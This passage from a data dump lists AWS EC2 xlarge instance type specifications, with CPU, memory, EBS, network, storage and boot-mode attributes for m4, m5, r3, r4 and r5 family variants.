{'SupportedStrategies': ['partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 750, 'BaselineThroughputInMBps': 93.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 750, 'MaximumThroughputInMBps': 93.75, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.4}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 750, 'BaselineThroughputInMBps': 93.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 750, 'MaximumThroughputInMBps': 93.75, 
'MaximumIops': 6000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': 
{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 
Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5a.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 
'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5ad.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 
'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 16384, 'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'm5d.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': 
{'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 16384}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 31232, 'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 80, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 
'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r3.xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 31232}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 80, 'Disks': [{'SizeInGB': 80, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 500, 'BaselineThroughputInMBps': 62.5, 'BaselineIops': 4000, 'MaximumBandwidthInMbps': 500, 'MaximumThroughputInMBps': 62.5, 'MaximumIops': 4000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Moderate', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 
'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 31232, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 850, 'BaselineThroughputInMBps': 106.25, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 850, 'MaximumThroughputInMBps': 106.25, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r4.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.3}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 31232}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 850, 'BaselineThroughputInMBps': 106.25, 'BaselineIops': 6000, 
'MaximumBandwidthInMbps': 850, 'MaximumThroughputInMBps': 106.25, 'MaximumIops': 6000}, 'NvmeSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'supported', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 
'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.1}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1150, 'BaselineThroughputInMBps': 143.75, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 4750, 'MaximumThroughputInMBps': 593.75, 'MaximumIops': 18750}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 
'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5a.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NvmeSupport': 'required'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True, 'SupportedBootModes': ['legacy-bios', 'uefi']}, {'SupportedArchitectures': ['x86_64'], 
'SustainedClockSpeedInGhz': 2.2, 'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'supported', 'EbsOptimizedSupport': 'default', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 'MaximumIops': 16000}, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4, 'MaximumNetworkCards': 1, 'DefaultNetworkCardIndex': 0, 'NetworkCards': [{'NetworkCardIndex': 0, 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 4}], 'Ipv4AddressesPerInterface': 15, 'Ipv6AddressesPerInterface': 15, 'Ipv6Supported': True, 'EnaSupport': 'required', 'EfaSupported': False, 'EncryptionInTransitSupported': False, 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'r5ad.xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'SupportedVirtualizationTypes': ['hvm'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.2}, 'VCpuInfo': {'DefaultVCpus': 4, 'DefaultCores': 2, 'DefaultThreadsPerCore': 2, 'ValidCores': [2], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 150, 'Disks': [{'SizeInGB': 150, 'Count': 1, 'Type': 'ssd'}], 'NvmeSupport': 'required', 'EncryptionSupport': 'required'}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'EbsOptimizedInfo': {'BaselineBandwidthInMbps': 1085, 'BaselineThroughputInMBps': 135.625, 'BaselineIops': 6000, 'MaximumBandwidthInMbps': 2880, 'MaximumThroughputInMBps': 360.0, 
